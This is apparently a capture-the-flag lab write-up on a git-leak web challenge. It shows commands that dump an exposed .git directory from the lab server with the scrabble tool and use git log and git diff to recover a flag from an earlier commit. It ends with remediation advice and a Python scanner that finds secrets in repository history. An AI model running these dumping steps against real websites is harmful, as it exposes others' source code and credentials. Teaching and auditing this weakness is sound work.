Simple Web 0x01(Lab - `gitleak`)

tags: NTUSTWS CTF Web

Challenge: http://h4ck3r.quest:9000/

Exploit - gitleak + basic Git command

  1. Use the Dotgit extension for Firefox (or Google Chrome) to check whether the website actually has a git leak problem.

  2. Use the scrabble tool (denny0223/scrabble) to pull the leaked repository information:
    $ git clone https://github.com/denny0223/scrabble.git
    $ cd scrabble
    $ sudo ./scrabble http://h4ck3r.quest:9000/
    
  3. Still no flag. There is a flag.php, but it contains no flag. The tool's output says `HEAD is now at a0228bd Remove flag`, so we can look up the history with the command below.
     $ git log --stat a0228bd
     commit a0228bd6ff968f3eca017125a5434b517ad2a83a (HEAD -> master)
     Author: splitline <tbsthitw@gmail.com>
     Date:   Wed Mar 9 16:23:46 2022 +0800
    
         Remove flag.
    
      flag.php | 2 +-
      1 file changed, 1 insertion(+), 1 deletion(-)
    
     commit 6cfe38db75ec90126f53088ea87c286c83c1bfb3
     Author: splitline <tbsthitw@gmail.com>
     Date:   Wed Mar 9 16:23:15 2022 +0800
    
         Init
    
      flag.php  | 5 +++++
      index.php | 1 +
      2 files changed, 6 insertions(+)
    
  4. Check the difference between HEAD and the earlier commit:
     $ git diff HEAD <commit-id>
     diff --git a/flag.php b/flag.php
     index d1f8785..5b6cf79 100644
     --- a/flag.php
     +++ b/flag.php
     @@ -1,5 +1,5 @@
      <?php
     -// No flag for you!
    - [ ]     +$FLAG = "FLAG{gitleak_is_fun}";
      ?>
    
      Flag is in the source code.
     \ No newline at end of file
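
Review bot: the `+$FLAG = "FLAG{gitleak_is_fun}";` line in flag.php is the older side of this comparison, because the diff runs from HEAD to the earlier commit; HEAD only swaps that line for `// No flag for you!`, so blob 5b6cf79 with the secret is still in the object store. A follow-up commit cannot retract a committed secret: treat the value as exposed and rotate it, rewrite history if the repository is shared, and keep the .git directory out of the served web root.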
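
Why the "Remove flag." commit in steps 3 and 4 removed nothing, as an added example that is not part of the original writeup: it reads a repository's loose objects directly and reports every historical blob that still matches a secret pattern, which is the check to run on your own repository before deploying it. The sample history and its flag value are constructed, the function names are this example's own, and only loose objects are handled (no packfiles, first-parent history only).

```python
import hashlib, re, tempfile, zlib
from pathlib import Path

def write_obj(gitdir, kind, body):
    raw = f"{kind} {len(body)}".encode() + b"\0" + body  # "<kind> <len>\0<body>"
    sha = hashlib.sha1(raw).hexdigest()                   # object id = SHA-1 of raw
    path = Path(gitdir, "objects", sha[:2], sha[2:])
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(zlib.compress(raw))                  # loose objects are zlib-deflated
    return sha

def read_obj(gitdir, sha):
    raw = zlib.decompress(Path(gitdir, "objects", sha[:2], sha[2:]).read_bytes())
    return raw.split(b"\0", 1)[1]                         # drop the header

def blobs_in_tree(gitdir, tree_sha, prefix=""):
    body, i = read_obj(gitdir, tree_sha), 0
    while i < len(body):
        nul = body.index(b"\0", i)        # entry = b"<mode> <name>\0" + 20 raw SHA-1 bytes
        mode, name = body[i:nul].decode().split(" ", 1)
        sha, i = body[nul + 1:nul + 21].hex(), nul + 21
        if mode == "40000":               # sub-directory: recurse into its tree
            yield from blobs_in_tree(gitdir, sha, prefix + name + "/")
        else:
            yield prefix + name, read_obj(gitdir, sha)

def secrets_in_history(gitdir, head, pattern):
    hits, sha = [], head
    while sha:                            # follow first-parent links back to the root
        meta = read_obj(gitdir, sha).split(b"\n\n", 1)[0].decode().split("\n")
        tree = next(l.split()[1] for l in meta if l.startswith("tree "))
        for path, data in blobs_in_tree(gitdir, tree):
            hits += [(sha[:7], path, m.decode()) for m in re.findall(pattern, data)]
        sha = next((l.split()[1] for l in meta if l.startswith("parent ")), None)
    return hits

def build_sample(gitdir):
    head = None                           # constructed history shaped like the lab's
    for src, msg in [(b'<?php\n$FLAG = "FLAG{constructed_sample}";\n?>\n', "Init"),
                     (b"<?php\n// No flag for you!\n?>\n", "Remove flag.")]:
        blob = write_obj(gitdir, "blob", src)
        tree = write_obj(gitdir, "tree", b"100644 flag.php\0" + bytes.fromhex(blob))
        parent = f"parent {head}\n" if head else ""
        head = write_obj(gitdir, "commit", f"tree {tree}\n{parent}\n{msg}\n".encode())
    return head

def demo():
    with tempfile.TemporaryDirectory() as gitdir:
        return secrets_in_history(gitdir, build_sample(gitdir), rb"FLAG\{[^}]*\}")
```

`demo()` returns a single hit, located in the parent commit rather than in HEAD: the blob written by "Init" stays addressable by its hash after the later commit points flag.php at a new blob.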